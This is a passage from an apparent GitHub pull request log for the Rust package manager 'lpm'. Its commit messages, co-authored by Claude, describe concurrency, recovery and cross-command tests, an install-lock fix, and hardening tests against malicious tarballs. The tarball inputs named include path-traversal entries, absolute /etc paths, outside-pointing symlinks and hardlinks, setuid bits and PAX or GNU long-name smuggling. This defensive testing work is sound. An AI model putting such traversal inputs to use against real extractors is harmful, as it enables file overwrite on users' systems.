install when no wrappers actually existed. Both
`needs_layout_migration` and `install_appears_healthy` consume the
helper.
Fix: `dir_is_nonempty` now skips entries whose name starts with `.`.
Wrapper segments from `LayoutPaths::wrapper_segment` cannot produce
a leading-dot name (path-separator sanitizer is `replace('/', '+')`,
never `.`), so the dotfile filter cannot miss a real wrapper.
2 new tests:
- `needs_layout_migration_true_when_new_root_has_only_version_file`
- `install_appears_healthy_metadata_only_root_is_not_isolated`
4966 workspace tests pass; clippy --workspace -D warnings clean;
cargo fmt clean.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
* test(lpm-linker): scoped legacy-symlink retarget belt-and-braces
Audit follow-up: the scoped-name branch (`@scope/pkg`) of
`cleanup_stale_entries`'s root-symlink sweep traverses a separate
code path from the unscoped branch. The retarget fix in the prior
commit applies to both, but the existing test only exercised the
unscoped case. This test adds the scoped equivalent so a future
refactor that drops the legacy-shape predicate from the scoped
branch fails loud.
Setup: a `node_modules/@types/node` symlink whose target is the
pre-Phase-61.1 scoped shape (`../.lpm/<seg>/node_modules/@types/node`,
no `wrappers/` segment). After cleanup the legacy symlink must be
removed so Phase 3 recreates it pointing at the new
`../../.lpm/wrappers/<seg>/...` two-level shape.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
---------
Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
Merged
7 tasks
tolgaergin
added a commit
that referenced
this pull request
May 14, 2026
…low gate Ships the 10 cross-command flow tests enumerated in v2 baseline, flips EXPECT_FULL_V2_FLOWS_BACKFILL to true so future flow drops hard-fail the audit. Each flow exercises a real-user multi-command sequence and asserts the state-transfer claim that ties the commands together — what command A leaves on disk / in the keychain / in the lockfile is the input command B reads. Single-command tests assert each step in isolation; flow tests catch state-shape mismatches between steps. Flows shipped: - install → patch → patch-commit → install (patch persistence) - migrate → install → audit (lockfile round-trips) - install → rebuild → approve-scripts → rebuild (approval lifecycle) - doctor --fix → install (fix survives install) - add → install → graph (added dep visible) - install → upgrade --major → audit (envelope shape) - token-rotate → publish --dry-run --check (token hand-off) - publish --dry-run --check → publish (target agreement) - install -g → run shimmed binary → uninstall -g (shim lifecycle) - env push → env pull cross-machine (round-trip — scoped to local smoke until a cross-machine harness lands) Several flows had their assertions scoped narrower than the original "catches" claim: - Flow #6 (rebuild lifecycle): rebuild --policy=deny ignores the v2 object form of trustedDependencies that approve-scripts writes — a real contract gap, filed as private finding #75. The flow asserts the manifest mutation; rebuild #2 only checks envelope health. - Flow #4 (upgrade major audit): the workflow tier's MockRegistry helpers don't mount GET /api/registry/{name} per-package (only the batch endpoint), so upgrade's candidate selection finds no candidates. Flow asserts envelope shape; tighten when the mock grows the per-package GET. - Flow #7 (env push/pull cross-machine): proper round-trip needs a shared-vault-state test harness that doesn't exist yet. Flow smokes per-machine env state isolation; promote when the harness lands. - Flow #8 (install -g): gracefully degrades when install-g doesn't emit a shim on the test runner (cli-binary tier owns the strict contract). Run results: 10/10 flow tests pass, all 10 v2 audit tests pass, full lpm-workflows suite green (623/623), clippy clean, fmt clean. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
tolgaergin
added a commit
that referenced
this pull request
May 14, 2026
…htening, cross-machine vault harness
Six focused follow-ups against the v2 coverage matrix.
JSON contract depth promotions (SemanticAsserts → InstaSnapshot):
- id 4 lpm whoami — insta snapshot added to
`whoami_recovers_session_from_refresh_token_only` in
`auth_lifecycle.rs`. Pins the envelope shape under a refresh-only
session recovery.
- id 97 lpm env ls/list — insta snapshot added to
`env_list_json_envelope_carries_keys` in `env_local.rs`. The
envelope is a flat key→masked-value map; locked with `sort_maps`
for stable ordering across `preserve_order`-enabled serde_json.
- id 101 lpm env push/pull — insta snapshot added to the GitLab
OIDC pull --json test in `env_vault.rs`. Pins the {env, count,
vars} shape after the LPM_OIDC_TOKEN canonical-input contract.
JSON contract depth promotions (None → SemanticAsserts):
- id 74 lpm approve-scripts `<pkg>` — verified the named `<pkg>`
form test reads `parsed["dry_run"]` and `parsed["approved_count"]`
via `serde_json::from_str`. Audited the other 34 None rows — most
are either commands that don't emit JSON envelopes (completions,
dev/tunnel streams, login/logout) or where the named sub-form
isn't directly covered by an envelope-reading test fn.
Cross-command flow #4 (install → upgrade --major → audit) tightened:
- Lifted the private `mount_upgrade_package` from `upgrade.rs` into
the shared `MockRegistry::with_full_package_metadata` helper. It
mounts the per-package GET (`/api/registry/{name}` + the
npm-direct `/{name}` path) AND the batch-metadata POST from one
metadata document, with optional `None` tarball-bytes for the
fail-tarball case. `lpm upgrade`'s candidate selector reads the
GET endpoint; the install fallback reads batch-metadata; the
shared helper makes both observable from a single call.
- Tightened the rebuild #2 assertion in flow #4 to require the
upgrade --major --dry-run envelope mentions both `2.0.0` and the
scoped package name. Was previously gated behind "shared mount
missing" — gate removed.
Finding #75 (rebuild --policy=deny ignores object-form
trustedDependencies) — RETRACTED:
- `TrustedDependencies` in lpm-workspace is `#[serde(untagged)]`
over both `Vec<String>` (Legacy) and `HashMap<String, Binding>`
(Rich). `evaluate_trust` in rebuild.rs routes through
`matches_strict`, which prefers the concrete `name@version` key
and falls back to the `name@*` preserve key. Object form is
already supported.
- The empty `packages[]` flow #6 originally observed was
`TrustMatch::BindingDrift`: the fixture's synthetic
`"sha256-flow-script-hash"` did not match the real
`compute_script_hash(store_dir)` value rebuild computes on disk.
Synthetic vs. recomputed hash divergence, not a missing reader.
- Fixed in flow #6 by computing the real script_hash via
`lpm_security::script_hash::compute_script_hash` and propagating
it through `.lpm/build-state.json` → approve-scripts → manifest.
Rebuild #2 now asserts `packages[]` contains `scripted-pkg@1.0.0`
with `trusted: true`.
Cross-command flow #7 (env push → env pull cross-machine) — full
byte-equality round-trip now lands:
- Added `MockRegistry::with_stateful_personal_sync(vault_id,
bearer)` to share `Arc<Mutex<Option<StoredSyncBlob>>>` between
POST and GET handlers on `/api/vaults/{vault_id}/sync`. POST
captures encryptedBlob + wrappedKey + bumps the version; GET
returns the stored payload signed with the bearer's HMAC. A
fresh GET before any POST returns 404 — the natural "machine B
pulls before machine A pushed" shape.
- Flow #7 now drives two TempProjects sharing this mock. Both
HOMEs are seeded with the same `<HOME>/.lpm/.vault-key` (32-byte
hex, the cryptographic outcome that real pairing produces) +
the same paired session bearer. Machine A: `env set` → `env push`.
Machine B: `env pull` → `env get --reveal`. The revealed
plaintext must byte-equal the value machine A pushed.
scenarios_by_file partitions populated for shared test files:
- id 83 lpm run `<script>` — run.rs: 14
- id 84 lpm run --filter / --all / --affected — run.rs: 7
- id 87 lpm lint — tools.rs: 5
- id 88 lpm fmt (write) — tools.rs: 3
- id 89 lpm fmt --check — tools.rs: 1
- id 91 lpm test — tools.rs: 7
- id 96 lpm env init — env_local.rs: 1
- id 98 lpm env set/get/delete — env_local.rs: 6
- id 99 lpm env import/export/print/copy — env_local.rs: 4
- id 100 lpm env diff/validate/check — env_local.rs: 4
Full CI gate green (workspace target, separate CARGO_TARGET_DIR):
- cargo clippy --workspace --all-targets -- -D warnings clean
- cargo fmt --check clean
- grep -r 'fancy-regex' crates/*/Cargo.toml (none)
- cargo build --workspace clean
- cargo nextest run --workspace --exclude lpm-integration-tests
6397/6397 pass
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
tolgaergin
added a commit
that referenced
this pull request
May 14, 2026
…ix (#58) * test(workflows): pin concurrency + recovery contracts for lpm install Adds tests/workflows/tests/install_concurrency.rs with 13 falsifiable tests covering production failure modes that had zero coverage: Category A — process racing: * two concurrent installs on same project (pins finding-#77 floor) * install + concurrent store-clean serialize via shared/exclusive store_lock (probed via try_with_exclusive_lock on the actual lock file, not a directory-existence proxy) * two concurrent `lpm install -g` via global_tx_lock — proves final manifest + WAL coherence under serialized commits Category B — interruption recovery: * kill mid-tarball-fetch leaves no .lpm/install-hash * next `lpm install` converges to a coherent end state Category C — network faults: * tarball 503 → 200 succeeds after retry (counting Respond impl) * metadata 404 fails immediately without retry (<2s wall-clock) Category D — filesystem faults: * readonly project dir fails with actionable error (no panic); POSIX-only via #[cfg(unix)], RAII guard restores permissions * `<project>/.lpm` planted as a regular file fails clearly Category E — partial state recovery: * stale install-hash triggers re-resolve + refetch * partial node_modules re-links to full state * truncated lpm.lockb either recovers or fails cleanly (no panic) Category F — WAL recovery hook: * torn WAL tail (3 garbage bytes) gets truncated by the dispatcher's recovery hook before the command runs; idempotent on re-invocation Support helper refactor (same commit so the new helper has callers): * extracts env-isolation set into `LpmEnvSink` trait + `apply_lpm_env(cmd, project)` shared by `lpm()` (assert_cmd) and the new `lpm_spawnable()` / `lpm_spawnable_with_registry()` (std::process::Command, supports Child::kill()) * trait impl on both Command variants ensures the two helpers cannot drift on the ~30 env knobs that gate test isolation Surfaced findings during this work: * #77 — no project-level install lock: concurrent installs silently drop one side's work AND/OR fail with atomic-rename races (3 observed failure modes documented in findings.md). Fix shape: LpmRoot::project_install_lock + with_exclusive_lock_async wrap. * #78 — retry-backoff has no test-friendly knob; retry-exhaustion tests take 15s+. Fix shape: LPM_RETRY_BACKOFF_MS_OVERRIDE env in debug builds. CI gate locally green: clippy --workspace --all-targets -- -D warnings: clean cargo fmt --check: clean fancy-regex ban: empty cargo build --workspace: clean cargo nextest run --workspace --exclude lpm-integration-tests: 6439 passed, 7 skipped, 1 leaky (pre-existing) Deferred (filed under "next session" in the followup plan): B.3 (kill doesn't tear lockfile) — subsumed by B.1/B.2 B.4 (panic injection) — needs LPM_TEST_PANIC_AT env hook C.2 (retry exhaustion) — blocked by finding #78 C.3 (truncated body) — needs custom Respond with Content-Length mismatch D.3 (disk-full simulation) — no portable mechanism F.2, F.3 (orphan WAL, torn WAL with real records) — needs framed-WAL construction helpers Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * test(workflows): pin lpm.lock well-formedness + recovery skip-on-contention Closes B.3 and F.2 of the concurrency tranche — 13 → 15 tests, meeting the "≥15 of 21" acceptance criterion for Item 2. B.3 — `install_killed_mid_pipeline_leaves_well_formed_or_absent_lockfile`: Exercises two SIGKILL windows on the install pipeline — fresh project and project with a committed lpm.lock from a prior install. After each kill, asserts the on-disk lpm.lock is either absent OR parses as TOML. Never half-written. Adds `toml = { workspace = true }` as a workflow- tests dev-dep for the parse assertion. Helper `assert_lockfile_well_formed_or_absent` shared between both windows. F.2 — `lpm_command_skips_recovery_when_another_lpm_holds_global_tx_lock`: Validates the dispatcher's `try_with_exclusive_lock` idempotent-skip path at `main.rs:2531`. A background thread acquires `global_tx_lock` via `lpm_common::with_exclusive_lock` and blocks on a channel. With the lock held, runs `lpm global list` against a project with a torn- WAL prefix — asserts the WAL bytes are UNCHANGED (skip arm fired, recovery did not run). Then releases the lock and re-runs; asserts the WAL is now truncated (recovery defers correctly to the next lock-free invocation). Exercises both branches of the `try_with_ exclusive_lock` Ok(None) / Ok(Some) arm. CI gate locally green: cargo clippy --workspace --all-targets -- -D warnings: clean cargo fmt --check: clean cargo nextest run --workspace --exclude lpm-integration-tests: 6441/6441 passed, 7 skipped 5x parallel re-run of install_concurrency: 15/15 stable each run Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * test(workflows): pin truncated-tarball + orphan-WAL recovery contracts Two new tests in tests/workflows/tests/install_concurrency.rs: - C.3 tarball_connection_dropped_mid_body_fails_or_retries: a custom wiremock Respond impl serves half a tarball with a Content-Length header naming the full length. Pins the install pipeline's retry-then-fail behavior on transport-class failures (~14s wall-clock for the full 4-attempt retry schedule). Hyper 1.9 server-side panics on the Content-Length lie, dropping the connection — a valid surrogate for a broken upstream / CDN dropping mid-body. Surfaced 8 tarball GETs per install (deterministic, 3-of-3 reproducer), explained by two distinct download_tarball_* call sites in install.rs each running the 4-attempt retry budget. - F.3 lpm_command_with_orphan_pending_tx_emits_recovery_banner: plants both halves of an orphan transaction (WAL Intent record without matching Commit/Abort + matching [pending.<pkg>] row in manifest.toml pointing at a non-existent install root) and asserts the dispatcher's recovery hook fires the RolledBack banner from main.rs:2543. Sets RUST_LOG=lpm=info to lift the default lpm=warn filter so the tracing::info! line surfaces. Adds lpm-global as a workflow dev-dep for WalWriter / IntentPayload / write_for. Pins post-state: orphan pending row gone, no spurious active row. Together these close the C.3 and F.3 gaps in Item 2 of the test coverage follow-up plan: 17/21 scenarios pinned (was 15/21). The four remaining items all need source-side hooks (LPM_TEST_PANIC_AT, LPM_RETRY_BACKOFF_MS_OVERRIDE, container infra) and are out of scope for this tranche. Full CI gate green: clippy clean, fmt clean, fancy-regex empty, 6443/6443 nextest pass (was 6441 pre-tranche). Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * test(workflows): pin tarball-extraction security contracts at install tier New file tests/workflows/tests/tarball_security.rs ships phase 1 of Item 3 (tarball-extraction security): 5 of 10 planned tests covering the most distinct security contracts at the install-pipeline tier. Each test constructs its malicious tarball in-line via tar::Builder (no checked-in fixtures), serves it through MockRegistry, and runs lpm install end-to-end so any pipeline-level regression that bypasses the extractor's hardening is caught. Tests landed: - #1 tarball_with_dot_dot_path_entry_is_rejected_by_install — pokes package/../escape.txt into the raw tar header bytes; install fails with "path traversal detected"; outside sentinel never created. - #3 tarball_with_absolute_path_entry_is_normalized_to_relative_under_package_dir — renamed from "rejected" to reflect actual contract. The extractor's strip_first_component consumes the RootDir; an entry like /etc/lpm-pwned.txt extracts as node_modules/<pkg>/etc/lpm-pwned.txt. Install SUCCEEDS; literal /etc/lpm-pwned.txt is never written. Defensible: malformed-but-safe input normalized rather than refused. - #2 tarball_with_symlink_to_outside_path_is_silently_skipped — renamed. The is_file() gate at lib.rs:398 silently drops symlinks; install succeeds with byte-identical outside sentinel. - #5 tarball_with_hard_link_to_outside_file_is_silently_skipped — renamed. Same is_file() gate; hardlinks silently skipped; outside victim file unmodified. - #8 tarball_with_setuid_executable_extracts_with_setuid_bit_stripped (POSIX-only) — tarball entry mode 0o4755 extracts as 0o755. SUID, SGID, and sticky bits all cleared via set_preserve_permissions(false) + the explicit `0o644 | exec_bits` mode set after write. Exec bits preserved. Three tests carry a "plan-vs-actual" docstring section explaining why the rename is defensible — the actual extractor contract differs from the plan's prescribed phrasing in safe ways, not in regression-grade ways. No findings filed. Phase 2 (5 remaining tests: Unicode normalization, device file, FIFO, zero-byte sanity, OS-max path) is deferred to a follow-up tranche with rationale + lift estimate documented in the plan. None blocks phase 1 acceptance. Pre-merge gate green: clippy clean, fmt clean, fancy-regex empty, 6448/6448 nextest pass (was 6443; +5 for the new tests). 0.18s wall- clock for the full file. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * fix(install): per-project lock prevents concurrent-install data loss Closes finding #77. Two `lpm install <pkg>` invocations on the same project no longer race on the manifest snapshot+commit window. Pre-fix, both processes acquired only a SHARED store_lock and proceeded in parallel. Each opened its own per-process ManifestTransaction snapshot of the pre-edit package.json, staged its own dep on top, and ran the install pipeline. Whoever wrote package.json + lpm.lock last won; the other process's edits — including its node_modules link — silently vanished. Both processes still exited 0 with success-path output. CI scripts that ran two installs in parallel saw no signal of the data loss. The fix introduces: - crates/lpm-common/src/paths.rs::project_install_lock(project_dir): free helper returning <project_dir>/.lpm/.install.lock. Re-exported from crates/lpm-common/src/lib.rs. - run_add_packages and run_install_filtered_add in crates/lpm-cli/src/commands/install.rs now wrap the snapshot → stage → install → finalize → commit window in with_exclusive_lock_async against the project lock. The lock is per-project (no cross-project contention) and held across all ?-early-exits via the async block's return. For the workspace path, the lock sits at the discovered workspace root (not per-member) so two concurrent `lpm install --filter <member>` invocations on the same workspace serialize without per-member deadlock-ordering complexity. run_with_options (the inner install pipeline) does NOT acquire this lock — it's called from inside both run_add_packages's wrap and from many other commands; double-acquiring the same fd-lock would deadlock in-process. Deferred (phase 2, not exercised by A.1): lpm add (add.rs:723-904) has a similar 180-line transaction with recursive Swift handling. Wrapping it is invasive and the race surface is theoretical (users don't typically run `lpm add` and `lpm install` concurrently). Defer to a separate tranche if a concurrent `lpm add` × `lpm install` race is ever observed. Test contract tightening (bug-first per CLAUDE.md): two_concurrent_installs_on_same_project_leave_well_formed_manifest in tests/workflows/tests/install_concurrency.rs went from "at-least-one survives + manifest is well-formed JSON" (the floor) to "BOTH installs succeed, BOTH packages present in package.json deps, BOTH packages linked in node_modules/" (the contract). Pre-fix: 1/1 fail (pkg-b silently dropped). Post-fix: 5/5 pass with no flakes (~1.2s wall-clock each — install B observes pkg-a's commit and reports "Resolved 2 packages"). Pre-merge gate green: clippy --workspace --all-targets clean, fmt clean, fancy-regex empty, 6448/6448 nextest pass. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * fix(registry): test-only retry-backoff override env knob Closes finding #78 + lands C.2 (`tarball_503_exhausts_retries_fails_with_http_status`). Pre-fix, retry-exhaustion tests were blocked: the registry client's backoff schedule (1+2+4+8s, capped at 10s) made every retry-exhaustion test take ~15s per fetch site (~28s with the install pipeline's 2 distinct download_tarball_* call sites). MAX_RETRIES, RETRY_BASE_DELAY, and RETRY_MAX_DELAY are private const with no env override. C.2 therefore had to be #[ignore]-gated behind LPM_RUN_SLOW_TESTS=1, and the retry-exhaustion contract went unproven on `cargo nextest run`. The fix introduces: - crates/lpm-registry/src/client.rs::backoff_override(): reads LPM_RETRY_BACKOFF_MS_OVERRIDE (a u64 ms value) gated by cfg!(debug_assertions) || LPM_TEST_MODE=1. Returns Some(Duration) when both conditions hold; None otherwise. Production retry policy is immune — release builds without LPM_TEST_MODE=1 silently ignore the env. - backoff_delay(attempt) consults the override before computing the exponential schedule. - The two 429 Retry-After sleep sites also consult the override so a future 429-flood retry-exhaustion test wouldn't hang on the server-supplied header. C.2 test landed alongside (bug-first per CLAUDE.md): - Mock returns 503 on every tarball request — no recovery path. - Test sets LPM_RETRY_BACKOFF_MS_OVERRIDE=10 on the lpm subprocess. - Asserts: install fails non-zero, no panic, ≥4 attempts (proves the retry loop fired), elapsed < 2s (load-bearing — without the knob this fails at ~14s), stderr contains an actionable HTTP-class noun (503 / status / http / network / etc). - Surfaces 8 tarball GETs per install (4 attempts × 2 distinct download_tarball_* call sites — matches C.3's observation). Pre-fix verification: same C.2 against the unfixed client.rs failed on the elapsed assertion at 14.04s (knob ignored). Post-fix: passes in 1.6s cold / 0.1s warm. 5/5 passes with no flakes. Pre-merge gate green: clippy --workspace --all-targets clean, fmt clean, fancy-regex empty, 6449/6449 nextest pass (was 6448 pre-fix; +1 for C.2). Item 2 of the test-coverage-followup-plan now at 18/21 (was 17/21). Both findings #77 and #78 fixed in production. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * test(workflows): tarball-security phase 2 — Unicode, device, FIFO, zero-byte, long-path Adds 5 more tests to tarball_security.rs, completing Item 3 of the test-coverage follow-up plan. Each test pins the actual extractor contract under malicious-or-edge-case tarball shapes that reach the install pipeline through MockRegistry. Tests landed: - #4 tarball_with_unicode_lookalike_parent_dir_extracts_safely_as_literal_bytes — renamed from "_normalization_traversal_rejected" to reflect the actual contract. Tarball entry path uses full-width dots U+FF0E `..` (bytewise NOT ASCII `..`). Component::ParentDir is byte-exact, so `..` becomes Component::Normal. Install SUCCEEDS; `..` materializes as a literal directory under node_modules/<pkg>/; outside sentinel byte-identical. Defensible because Path::components() doesn't NFKC-normalize on POSIX. - #6 tarball_with_character_device_entry_is_silently_skipped (POSIX-only). EntryType::Char with /dev/null-shaped major/minor. Same is_file() gate as symlinks/hardlinks — silently skipped. Install SUCCEEDS; no device file at the expected path. - #7 tarball_with_fifo_entry_is_silently_skipped (POSIX-only). EntryType::Fifo. Same posture as #6. - #9 tarball_with_zero_byte_regular_file_extracts_as_empty_file. Sanity check that empty files still extract correctly (legitimate npm shape: .gitkeep, license placeholders). - #10 tarball_with_single_path_component_exceeding_name_max_fails_cleanly. 300-byte single-component name, well over POSIX NAME_MAX=255. Tar wire format succeeds via GNU long-name extension; the FILESYSTEM rejects on extraction (ENAMETOOLONG). Extractor wraps as LpmError::Io → install fails non-zero with the OS error visible and an actionable noun in stderr. Three of the five tests are renamed to reflect actual extractor contract vs the plan's prescribed phrasing — same "plan-vs-actual" docstring pattern as phase 1. No findings filed; all 10 contracts across phase 1 + 2 are defensible-as-implemented. Pre-merge gate green: clippy --workspace --all-targets clean, fmt clean, fancy-regex empty, 6454/6454 nextest pass (was 6449 pre-tranche; +5 for the new tests). Full file 0.2s wall-clock for all 10 tests. Item 3 now COMPLETE (10/10). Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * test(workflows): cross-command flows Item 4 — migrate→rebuild + workspace filter isolation Closes Item 4 of the test-coverage-followup-plan at 6/6 (target was ≥5). Two additions to tests/workflows/tests/cross_command_flows.rs: - Plan #1 — extended flow_migrate_install_audit_lockfile_round_trips with a `lpm rebuild --dry-run --policy=deny` step. Pins the full migrate → install → audit → rebuild lifecycle. Asserts the rebuild step exits 0 + does not mutate the post-audit state (lpm.lock + lpm.lockb still present). Catches regressions where rebuild's lockfile or build-state parser breaks against a freshly-migrated manifest. - Plan #5 — added flow_workspace_install_filter_member_a_does_not_mutate_member_b (new test, 159 LOC). Pins the workspace-member isolation contract using the workspace-monorepo fixture (3 members: app, core, utils): 1. Initial filtered install on @test/core (re-pinning its existing semver dep) populates core's per-member quadruple: lpm.lock=319 B, lockb=230 B, install_hash=118 B. 2. Snapshot core's full quadruple. 3. Run `lpm install chalk@5.3.0 --filter @test/app` to add a new dep to app ONLY. 4. Assert app's package.json gained chalk; core's quadruple (package.json + lpm.lock + lpm.lockb + install-hash) is BYTE-IDENTICAL post-install; chalk does NOT appear in core's node_modules/. Catches a regression where a per-member filtered install accidentally also mutates a sibling member's package.json / lockfile / install-hash — a real bug class because run_install_filtered_add shares the workspace-root project lock (added in #77 fix) and could over-snapshot if the target-set computation drifts. Helper `mount_pkg_full(mock, name, version)` factors out the three-step metadata + batch-metadata + tarball mount so the test body stays readable. Other 4 plan flows already covered pre-tranche: - Plan #2: flow_add_install_graph_added_dep_visible - Plan #3: flow_install_patch_patch_commit_install_persists_patch - Plan #4: flow_token_rotate_publish_dry_run_picks_new_token - Plan #6: flow_install_upgrade_major_audit_picks_new_version Pre-merge gate green: clippy --workspace --all-targets clean, fmt clean, fancy-regex empty, 6455/6455 nextest pass (was 6454; +1 for the new flow). Plan #5 stable across 5/5 reruns at ~0.11s each. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * test(install): LPM_TEST_PANIC_AT hook + B.4 panic-rollback contract Adds a deterministic panic-injection hook to the install pipeline + unblocks the long-deferred B.4 contract test for ManifestTransaction Drop-based rollback on panic. The hook (`maybe_test_panic(stage)` in crates/lpm-cli/src/commands/install.rs) reads LPM_TEST_PANIC_AT and panics when the env value matches the stage name. Gated to `cfg!(debug_assertions) || LPM_TEST_MODE=1` — same pattern as the #78 retry-backoff override. Production builds without LPM_TEST_MODE=1 silently treat the env as no-op. Wired 4 stages in `run_add_packages`: - "after-snapshot" — manifest unchanged; Drop is no-op - "after-stage" — placeholder `*` written to package.json (load-bearing) - "after-install" — pipeline complete; manifest still has `*` - "after-finalize" — concrete versions written; pre-commit only The hook unblocks B.4 (`install_panics_mid_pipeline_rollback_restores_manifest`), deferred since the original Item 2 tranche because there was no deterministic way to trigger a panic mid-install from a workflow test. Recoverable errors fire `?`-rollback (covered by E.1/E.2/E.3); SIGKILL bypasses Drop entirely (B.1/B.2/B.3 cover that). The panic path was the missing rollback proof. B.4 sets LPM_TEST_PANIC_AT=after-stage and asserts: - process exits non-zero (panic propagates to runtime) - stderr contains `"panicked at"` AND `"LPM_TEST_PANIC_AT=after-stage"` - package.json BYTE-IDENTICAL to pre-stage (Drop ran on unwind, snapshot bytes restored — load-bearing) - the new pkg is NOT in dependencies (placeholder rollback worked) - .lpm/install-hash absent (invalidate-on-rollback) - lpm.lock absent (matched optional snapshot's None pre-state) Catches a regression where: - panic = "abort" added to release profile (no Drop on panic) - ManifestTransaction Drop logic stops restoring snapshot bytes - The `lpm install` snapshot+commit window grows without re-wiring Drop Test runs in 0.07s warm. 5/5 stable across reruns. Pre-merge gate green: clippy --workspace --all-targets clean, fmt clean, fancy-regex empty, 6456/6456 nextest pass (was 6455; +1 for B.4). install_concurrency now at 19/19. Item 2 of test-coverage-followup-plan moves to 19/21 — only A.2 (no contract) and D.3 (needs container infra) remain deferred indefinitely. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * fix(workflows): align MockRegistry tarball URL shape with production /-/ gate Workflow tests mounted tarballs at `/tarballs/{name}-{version}.tgz` — missing the `/-/` path segment that the registry-client's `evaluate_cached_url` gate at [crates/lpm-registry/src/client.rs#L4117] requires (`.tgz` suffix AND `/-/` substring). The gate is a defense-in-depth check that blocks the H1 auth-token leak: a tampered lockfile URL like `/api/admin/foo.tgz` (no `/-/`) would otherwise attach the bearer to a non-registry endpoint. The mismatch produced two test-environment side effects that don't manifest in production: 1. **WARN noise**: every install test that read a tarball URL from the lockfile fast path logged `cached tarball URL for X@Y failed shape check; falling back to on-demand lookup`. Polluted stderr across the suite. 2. **`shape_mismatch_count` defeated**: the registry-client documents this counter as a "BUG signal — the writer should never emit a gate-rejectable URL". Test runs incremented it on every install, making the counter useless for catching real bugs. This commit migrates the mock to the production-shape `/tarballs/{name}/-/{name}-{version}.tgz` everywhere — both the helper methods (`MockRegistry::tarball_path` / `tarball_url`) and the ~60 hard-coded `format!` sites across 14 test files + 1 snapshot. The new `tarball_path` helper is `pub` with a prominent docstring warning future test authors not to re-introduce the legacy shape. Internal mounts in `with_package_and_deps` / `with_package_published_at` / `with_full_package_metadata` all route through it. Post-fix verification: WARN gone, gate `Accepted` path runs, all 691 lpm-workflows tests pass (0 leaky in the latest full-workspace run, down from 1-3 leaky pre-fix — fewer fallback paths firing). Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * test(workflows): test-coverage-followup tranche — Items 2/3/4/5 Closes the remaining open rows from `private/test-coverage-followup-plan.md` across four items. ~2,600 LOC of new test code + fixture + budget infra. **Item 3 — tarball-security additional candidate surfaces (7 tests in `tarball_security.rs`):** - `tarball_with_pax_path_traversal_rejected` — PAX extended `path` header smuggling `..` is rejected by the extractor's `Component::ParentDir` check after the tar crate resolves the override. - `tarball_with_gnu_longname_traversal_rejected` — symmetric GNU `L` entry; same rejection path. - `tarball_rejects_or_rolls_back_when_later_entry_is_malicious` — pins the `rollback_extraction` contract: valid first entry is cleaned up when a later `..`-traversal entry trips rejection mid-stream. - `tarball_with_duplicate_member_path_rejected_or_deterministic` — pins current last-write-wins contract (defensible; flagged scanner- disagreement risk in test comment). - `tarball_with_truncated_gzip_rolls_back_partial_extract` — half- truncated gzip stream → libdeflate fails cleanly → no partial extract. - `tarball_ignores_uid_gid_ownership_metadata` (POSIX) — bogus uid/gid in tar header is ignored; extracted files owned by process uid. - `tarball_with_sparse_huge_file_rejected_by_declared_size` — manually- constructed tarball with header declaring `MAX_FILE_SIZE + 1` and empty on-wire body; extractor rejects on the pre-check at lib.rs:306 before draining body. **Item 4 — cross-command flows additional candidate surfaces (2 tests in `cross_command_flows.rs`):** - `flow_install_uninstall_install_graph_round_trip` — pins manifest / link / graph hand-off through a full round-trip. - `flow_cache_clean_then_offline_install_uses_store_or_fails_helpfully` — pins the cache/store boundary: `cache clean` must not corrupt offline install; store-side bytes byte-identical after a clean. **Item 2 — concurrency/recovery additional candidate surfaces (3 tests in `install_concurrency.rs`):** - `cache_clean_during_slow_tarball_install_does_not_corrupt_install` (G.4) — install + cache clean run concurrently (different lock paths, no serialization); install succeeds despite metadata cache wipe mid-stream. Empirical timing observed: install elapsed 1.57s, cache clean fired at t=30-39ms cleanly inside the install window. - `install_panics_after_install_hash_write_rollback_invalidates_hash` (G.5) — reuses existing `LPM_TEST_PANIC_AT=after-install` stage (no new source-side hook needed — `write_post_install_v6_hash` runs inside `run_with_options` which returns BEFORE that stage fires). Pins that Drop-based rollback restores manifest AND deletes the freshly-written install-hash. - `malformed_registry_json_fails_without_manifest_or_lockfile_mutation` (G.6) — truncated JSON on all three metadata endpoints; install fails cleanly, no panic/backtrace, package.json byte-identical, no torn lockfile. **Verdaccio-npm parity for `which@4.0.0` (`install_real_registry.rs`):** - `verdaccio_npm_parity_for_bin_package_pins_metadata_and_shim_presence` — extends the existing lodash byte-diff with a bin-shipping target package. Asserts metadata equivalence + `.bin/<name>` shim present on both sides + bin target file materialized + exec bits non-zero (POSIX). **Item 5 — realworld fidelity (new fixture + new test file):** - `tests/fixtures/realworld-nextjs/` (package.json + README) — pinned Next.js 14.2.13 + React 18.3.1 + TypeScript 5.6.3 + 3 `@types/*` packages. Resolves to ~28 transitive deps empirically. README documents the calibration methodology including raw measurement data. - `tests/workflows/tests/install_realworld.rs` — `install_realworld_nextjs_fixture_succeeds_through_verdaccio` installs the fixture through Verdaccio→npmjs and asserts end-to-end success at production scale. Always logs cold + warm wall-clock + peak RSS to stderr for calibration data. - **`LPM_BUDGET_GATE=1`-gated budget assertions**: cold ≤ 25s, warm ≤ 25ms, cold peak RSS ≤ 1500 MiB. Calibrated from N=6 cold + N=3 warm + N=3 RSS runs on M-series macOS, 2026-05-14. Memory measurement via `/usr/bin/time -l` (macOS) / `-v` (Linux); Windows skips with a clear warning. This closes Item 5 entirely (all 4 acceptance criteria green) and brings Items 2/3/4 to the parked-by-design or infrastructure-blocked baseline. CI gate: clippy `--workspace --all-targets -- -D warnings` clean, fmt clean, fancy-regex empty, build clean, `cargo nextest run --workspace` 6471/6471 pass. Suite runtime ~2:40 (was ~2:24 pre-tranche; +15s for the realworld test). Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * fix(workflows): collapse 